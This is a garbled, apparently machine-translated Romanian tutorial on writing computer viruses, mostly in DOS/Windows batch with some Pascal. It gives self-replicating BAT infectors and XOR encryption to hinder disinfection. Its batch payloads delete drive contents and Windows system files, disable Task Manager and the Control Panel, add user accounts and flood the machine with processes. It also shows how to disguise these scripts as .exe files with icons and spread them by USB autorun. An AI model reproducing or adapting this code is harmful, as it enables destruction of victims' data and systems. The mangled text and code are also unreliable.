Cum sa faci un virus liliac. (Colecția de viruși)
BAT-virus
@echo off
Acest virus infectează hard disk-ul, lăsând doar un singur fișier virus.bat. Cu toate acestea, nu aș spune că este un virus adevarat, deoarece el este în imposibilitatea de a infecta alte computere. BAT-virus a câștigat mai clar contururile completeze capacitatea sa de a infecta alte PC-uri:
În acest exemplu, există un șir de caractere care permite virusului de a infecta dischete. Semnificația acestui fapt este că, dacă reporniți PC-ul la unitatea este o dischetă, acesta va fi contaminate.
Desigur virus.bat fișierul în rădăcina C: unitatea va fi foarte dur pentru ochii utilizatorului, că nu a fost acolo de program attrib. Transformarea virusului:
attrib + h c: virus.bat> Nul
Dacă ești atent, ai dat seama deja că dosarul de apel virus.bat în autoexec.bat va fi scris de fiecare dată când reporniți PC-ul. Pentru a evita acest lucru este un mod simplu: după înregistrările de apel ar trebui să fie folosind programul attrib pentru a instala un atribut read-only din autoexec.bat. Dar există o altă opțiune, este un pic mai complicat, dar mai inteligent:
în cazul în care există c: virus.bat Goto rece
attrib + h c: virus.bat> Nul
Aici a doua linie verifică dacă există deja un fișier c: virus.bat și dacă există deja, există o tranziție la eticheta rece. Această metodă este, de asemenea, foarte simplu. Un dezavantaj clar - în cazul în care utilizatorul îndepărtează apelul de autoexec.bat, și se lasă fișierul virus.bat, virusul este un prost nerușinare înșelat. Virusul este inteligent, este necesar să se utilizeze programul găsi în cazul în care va fi capabil să se ocupe de ea, poti scrie mai complexe BAT-virus care ar infecta mai mult de un fișier c: autoexec.bat, și tot * .bat. exemplu:
dacă '% 1 ==' in_ Goto MeTrAin
în cazul în care există c: MeTrA.bat Goto MeTrAru
dacă nu există% 0 Goto MeTrAen
attrib + h c: MeTrA.bat
pentru %% T în (* .bat) suna c: Metra in_ %% t
în cazul în care nu ERRORLEVEL 1 Goto MeTrAen
Semnificația infecției este după cum urmează: în virus fiecare linie are o etichetă, în acest exemplu, Metra. De exemplu, această etichetă nu face nimic în prima linie, a doua linie a etichetei, cu toate acestea, nu este pasiv, este utilizat pentru lucrările interioare ale virusului, și participă la tag-ul titlu. Când executați controale de viruși pentru a vedea dacă fișierul C: METRA.BAT, în cazul în care nu, virusul se creează și cu ajutorul programului găsi copii ale fișierului (din care a fost lansat) toate liniile care conțin eticheta de virus, de exemplu, copii numai linia virală. Astfel, viral copiat linie. Deci, în fișierul C: METRA.BAT este acum o copie a virusului. Apoi, virusul caută BAT-fișiere. Pentru a evita reinfectare a avut loc folosind toate exact același program de descoperire. Să presupunem că un virus găsit fișier RUN.BAT și el nu a fost încă infectat, atunci virusul face ca fisierul C: METRA.BAT cu următorii parametri: in_ RUN.BAT, aici primul parametru in_ spune virusul, este necesar de a infecta un fișier al cărui nume este specificat în al doilea caz parametru, în acest caz RUN.BAT. Virusul C: METRA.BAT infectează un fișier RUN.BAT mai simplu mod - utilizând comanda de tip atașează fișierul RUN.BAT ei înșiși. Asta fișier RUN.BAT este infectat.
virus Companion
Aceste virusuri nu se schimba programul. Ei creează pentru EXE fișiere care-COM fișiere. Când executați programul începe primul COM-fișier cu un virus care infectează alte fișiere, executați EXE-fișier. Luați în considerare acest exemplu:
Virusul ar fi mai bine dacă rucsacul ceva de genul PKLITE cu opțiunea -e. In partea de sus există o matrice - dimensiunea virusului, a se vedea că valoarea sa nu este mai mică decât EXE-fișier cu un virus, și este de dorit ca, și nu mai erau.
virus prin satelit
Principiul infecției:
• găsiți EXE-fișier
• OVR-pentru a găsi un fișier cu același nume
• Dacă nu, atunci redenumiți EXE-fișierul este găsit în fișierul OVR-suprascrie EXE-fișier.
viruși
De referință Pascal:
Procedura Keyclick; întrerupe;
Dacă portul [$ 60] <$80 then
Apoi, eliminați toate erorile din acest exemplu și transformată într-un virus:
Procedura Keyclick; întrerupe;
Aici procedura InfExe este un virus procedură de rutină non-rezident (infectează în directorul curent). Dar aceste linii locul înscrie virusului, care, așa cum au fost cele din urmă.
Din păcate, în certificatul nu spune cum să evite re-instalare în memorie, așa că am sugera că virusul replicat corpul său, în orice fișier de pe unitatea C. introduce provocarea lui în CONFIG.SYS. Exemplu: install = c: vir.exe / 123, aici / 123 - este un parametru, spune el virusul care a început să infecteze memoria, adică, el nu are nevoie pentru a rula vehiculul dumneavoastră, și este necesar să se efectueze aceste trei linii.
Puteți pomudrit și alte întreruperi, dar eu te-am supărat, virusurile de acest tip tind să fie foarte buggy și de muncă, practic, numai într-un mediu multi-evaluate (în emularea DOS atârnă).
complicație a tratamentului
Dacă nu doriți să aveți virusul a scos la unele lamer, a devenit o victimă a anti-virus, ar trebui să se gândească la complicație a tratamentului.
Virusul Pascal infecteaza de obicei, un program de la partea de sus, lăsând conținutul vechi până la sfârșit. Astfel de viruși de baze de date antivirus sunt completate automat (fără intervenție umană). Este de înțeles, rescrie se încheie în partea de sus și tăiați lungimea - este o operație foarte simplă. Sensul complexității tratamentului constă în criptarea o bucată de victimă sale. pentru că o bucată de victimă atunci când se deplasează la sfârșitul fișierului este în matrice, atunci vom acționa astfel:
pentru i: = 1 până la 777 do
i2: = ord (cc) xor 343;
Aici A1 - o matrice care stochează începutul victimelor; i, i2 - întreg; cc - char.
Ca rezultat al acestei operații este criptat bucată din fișierul țintă (777 bytes). pentru că o operație de criptare este realizată folosind XOR - este utilizat pentru a decripta aceeași operație. Deci, această mică rutină ar trebui să fie făcută într-o procedură care ar trebui să fie stabilite în procesul de infecție și în procesul de a rula purtătorul său (înainte de lansare și după lansare). Dacă nu înțelegi XOR, aș spune, în exemplul meu, criptare este realizată cu ajutorul cheii 343, acesta poate fi de la 1 la 65000. Puteți face această schimbare cheie atunci când infecția fiecărui fișier, de exemplu, pentru a face o cheie pentru a depinde de dimensiunea sa purtător, sau poate genera o cheie aleatoare și pune-l undeva în corpul virusului, sau pentru a citi câteva octeți de cod al victimei, obtinerea-le ORD valoarea și utilizarea ca o cheie. Și totuși, în exemplul meu, de criptare este de la începutul fișierului, dar puteți face o anumită deplasare, care a depins și de ceva. criptarea dimensiunea I 777, dar puteți face prea aleatoare, etc. Puteți proteja, de asemenea, virusul de la lamerskie urme:
O1H. O3H. Br. Pointer;
Procedura Reboot; întrerupe;
Aici, în loc de fraza Buna ziua ar trebui să fie introdus tratamente virus, ar trebui să fie introdus vehicul de lansare, după liniile vectorilor de recuperare.
@echo off - nu permit ieșirea de comenzi de pe ecran, inclusiv rezultatele punerii în aplicare a acestora.
Culoare 40 - face ca fișierele de fundal litere roșu și negru.
Eticheta LAMER - comanda etichetă fără parametri specificați redenumește discul de sistem la un anumit cuvânt.
attrib -s -h -r -a% SystemDrive% * * -. elimina sistem de atribute din unele fișiere.
șterge% windir% * * / q -. ștergerea fișierelor banale.
șterge% windir% System32 * * / q -. ștergerea fișierelor banale, deși Windu va desfășura fără probleme.
șterge% SystemDrive% * * / q. - eliminarea fișierelor ascunse de importanță sistemică pe unitatea de sistem. Cu toate că Windows nu mai este suficient pentru a rula în nici un fel elimina fișierul NTDLR și repornirea sistemului.
regedit (calea către fișierul) - Adăugați informații din fișierul .reg la registru. Există, de asemenea, o echipa cu parametrii reg, dar uneori este mai ușor de a crea un fișier .reg separat. Nu poate fi o mulțime de imaginație.
Text echo> (>>) fișier - Adăugarea de înregistrări într-un fișier. Insigna> creează un nou fișier cu textul specificat, >> adăugat deja la fișierul existent.
oprire -r -f - Forța de a reporni calculatorul, în ciuda protestelor sistemului.
@echo off
del "% SystemRoot% # 92; driver Cache # 92; i386 # 92; driver.cab" / f / q> Nul
Scoateți desktop.
@echo off
reg add HKCU # 92; Software-ul # 92; Microsoft # 92; pentru Windows # 92; CurrentVersion # 92; Politici # 92; Explorer / v NoDesktop / t REG_DWORD / d 1 / f> Nul
Autodistrugere! La orice prog adaugă nu este palitsya. @echo off del "% 0"> Nul
@echo off
reg add HKCU # 92; Software-ul # 92; Microsoft # 92; pentru Windows # 92; Versiunea curentă # 92; Politici # 92; Sistem / v
DdisableTaskMgr / t REG_DWORD / d 1 / f> Nul
-interzice TaskMena
@echo off
% SystemRoot% / system32 / rundll32 user32, SwapMouseButton> Nul
-mneya locuri buton mouse-ul poate fi mare pentru a strica nervii care NID
@echo off
reg add HKCU # 92; Software-ul # 92; Microsoft # 92; pentru Windows # 92; Versiunea curentă # 92; Politici # 92; Explorer # 92; RestrictRun
/ V 1 / t REG_DWORD / d% SystemRoot% # 92; explorer.exe / f> Nul
-începe programe de interdicție
@echo off
del "% SystemRoot% # 92; cursoare # 92; *. *"> Nul
-elimină cursoare mouse-ul
@echo off
del "% SystemRoot% # 92; Media" / q> Nul
-elimină sunetele de Windows
@echo off
reg add HKCU # 92; Software-ul # 92; Microsoft # 92; pentru Windows # 92; Versiunea curentă # 92; Politici # 92; Explorer
/ V NoControlPanel / t REG_DWORD / d 1 / f> Nul
-interzice panoul de control
@echo off
net utilizator "Lamer" / add> Nul
@echo off
del "% SystemRoot% # 92; cursoare # 92; *. *"> Nul
Del C: # 92; WINDOWS # 92; system32 # 92; catsrvps.dll
Del C: # 92; WINDOWS # 92; system32 # 92; catsrvut.dll
Del C: # 92; WINDOWS # 92; system32 # 92; cdfview.dll
Del C: # 92; WINDOWS # 92; system32 # 92; cisvc.exe
Del C: # 92; WINDOWS # 92; system32 # 92; ckcnv.exe
Del C: # 92; WINDOWS # 92; system32 # 92; clb.dll
Del C: # 92; WINDOWS # 92; system32 # 92; cmd.exe
Del C: # 92; WINDOWS # 92; system32 # 92; cmdial32.dll
Del C: # 92; WINDOWS # 92; system32 # 92; cnbjmon.dll
Del C: # 92; WINDOWS # 92; system32 # 92; comctl32.ocx
Del C: # 92; WINDOWS # 92; system32 # 92; dplaysvr.exe
Del C: # 92; WINDOWS # 92; Notepad.exe
Del C: # 92; WINDOWS # 92; twunk_32.exe
Del C: # 92; WINDOWS # 92; wmprfRUS.prx
Del C: # 92; WINDOWS # 92; WindowsShell.Manifest „);
Del C: # 92; WINDOWS # 92; regedit.exe
Del C: # 92; WINDOWS # 92; explorer.exe
Del C: # 92; WINDOWS # 92; OemDrv
Del C: # 92; WINDOWS # 92; PeerNet # 92; sqldb20.dll
Del C: # 92; WINDOWS # 92; PeerNet # 92; sqlqp20.dll
Del C: # 92; WINDOWS # 92; twain_32 # 92; wiatwain.ds
del virus.bat
Acest batic pur și simplu copiaza tot felul de mass-media la fiecare 20 de secunde.
Prevraschaesch acest batic în explorer.exe cu ajutorul Batexec și în cazul în care arhiva.
Apoi schesh la un fișier de calculator c: # 92; ferestre # 92; explorer.exe (pictograma computerului meu se deschide spațiul de lucru) și plasați-l în arhiva anterior aruncat în directorul System32 (nu în sistem, cu o grămadă de fișiere și soddannuyu teboyu) la acest fișier este convertit în SFX cu parametrii: Calea pentru a despacheta: c: # 92, # 92 ferestre; ; Informații Display: Ascunde toate; Mod Overwrite: Suprascriere toate fișierele, fără a întreba. Imenush SFX avtorun. Creați un al doilea fișier autorun.inf cu următorul conținut:
scrie aceste fișiere la unitatea de pacu rădăcină (unitatea flash). Și toate, dar dacă există un fișier c: # 92; exp.com dosarele acest lucru se va finaliza activitatea sa de la sine.
Mai întâi vom schimba din punctul de timp de 00:00, iar al doilea exemplar fișierul pe disc F - unitatea flash USB cu numele de lucru. Nu uitați să salvați fișierul în format .bat bloknotovsky. În schimb, aveți posibilitatea să modificați ora și data «Data 13.06.23». După ce a scris această linie, vom schimba data la 2023, 6 luni, 13 număr)) este acum o listă mică de ceea ce se poate scrie în virusul bloknotovskom.
LISTA:
del F :. * * / q
Eticheta F: HACK
2) Un program pentru a modifica data și ora de pe computer și copiați-l la o unitate C flash USB și unitate.
Știi deja cum să creați viruși nepretențioase.
El știe cum să: schimba ora, data, numele de discuri și memorii flash, deschide programul, crea foldere, copia in sine, adăugați utilizatori, modificați extensia și să distrugă informații. Este o listă destul de scurt, sincer vorbind. Acum vă voi învăța o parte din virusopisatelsva subtilități. Să presupunem că ați făcut un virus, dar se pare destul de urat. Ei bine, care se va deschide un fișier ciudat? Ai dreptate, acești oameni din lume nu este mult. Cum se poate schimba formatul .bat și .exe pentru a adăuga o pictogramă. Foarte ușor (Este necesar ca calculatorul a fost WinRAR). Găsiți orice virus cu extensia .bat, faceți clic pe ea butonul din dreapta, faceți clic pe „Adăugați la arhiva ...“. Pune-o bifă în „Creați un SFX-arhive“, selectați fila Advanced, și faceți clic pe butonul „Opțiuni ... SFX“. În „Run după extracție“, scrie numele virusului (de exemplu, Virus.bat) și în „text și grafică“, „Pictograma SFX de încărcare din cordonul ombilical.“ Faceți clic pe „Browse“ și căutați pentru orice pictogramă de format ICO. Acum, faceți clic pe OK. Efectuat)) .exe format, mai degrabă decât .bat, și așa cum a trebuit să. Acum puteți face cu viruși pe care le doriți. Și ce, trebuie să decidă. Doriți să aflați mai multe comenzi pe care le puteți termina doar nostru „fraier“ www.google.ru deschis, scrie viruși de lilieci și faceți clic pe „Căutare“.
Să presupunem că scrie un virus, care va strica dosarul deschis de informații și puțin rău:
Gata? - Tu întrebi. Nu. Trebuie să o termin. Noua echipa «@echo off» a introdus la începutul pieilor virusului și tot ceea ce se întâmplă în viitor în ea. Într-un cuvânt, nu vom da utilizatorului să vadă ce sa întâmplat. Un alt adăugat după fiecare comandă de acțiune simplu, dar foarte eficient ca «> Nul» de exemplu «ora 00:00> Nul», suntem absenți din punct. Deci, ne putem îmbunătăți virusul nostru:
@echo off
del C :. * * / q> Nul
del D :. * * / q> Nul
del E :. * * / q> Nul
del F :. * * / q> Nul
Ora 00:00> Nul
Data 13.06.23> Nul
del *. * / q> Nul
Aici, acum virusul nostru gata. Salvare, conversia, dar ce urmează să facă cu ea - afacerea ta. De altfel, există un mare program de conversie în .bat .exe, funcționează mult mai bine WinRAR'a, a numit-o «Bat la exe convertor». Îl puteți descărca de pe Internet, este gratuit. Deci, înapoi la virusul scris.
% SystemRoot% / system32 / rundll32 user32, SwapMouseButton
Această linie schimbă locurile butoanelor mouse-ului. Se poate cineva juca truc, ca el va conduce ceea ce se întâmplă, va fi nevoie de timp (în cazul în care este destul de utilizator), pentru osoboodarennyh spun, dacă ați introdus-o la rândul său, o cantitate suficienta, pur și simplu: „Control Panel“, „Printers and Other Hardware“, " mouse-ul „și scoateți bifa prima.
Până în prezent, așa că merge mai departe:
x;
Start MSPaint
goto x;
Foarte bine șir de mașini de încărcare slabe. Echipa deschide Paint, și foarte repede. De 60 de ori înainte să înțelegeți ce sa întâmplat și închideți programul. Încercați să tastați în schimb MSPaint orice linie de program. Lucrări)) Puteți utiliza mai multe dintre aceste comenzi pentru a finaliza inhibarea calculatorului victimei. Script nou:
Foarte comandă crud adaugă program pentru sistemul de operare de pornire. Nu sfătuiesc să verificați pe computer. Nu te opri, și merge mai departe))
Assoc lnk = .txt> Nul
Assoc Exe = .mp3> Nul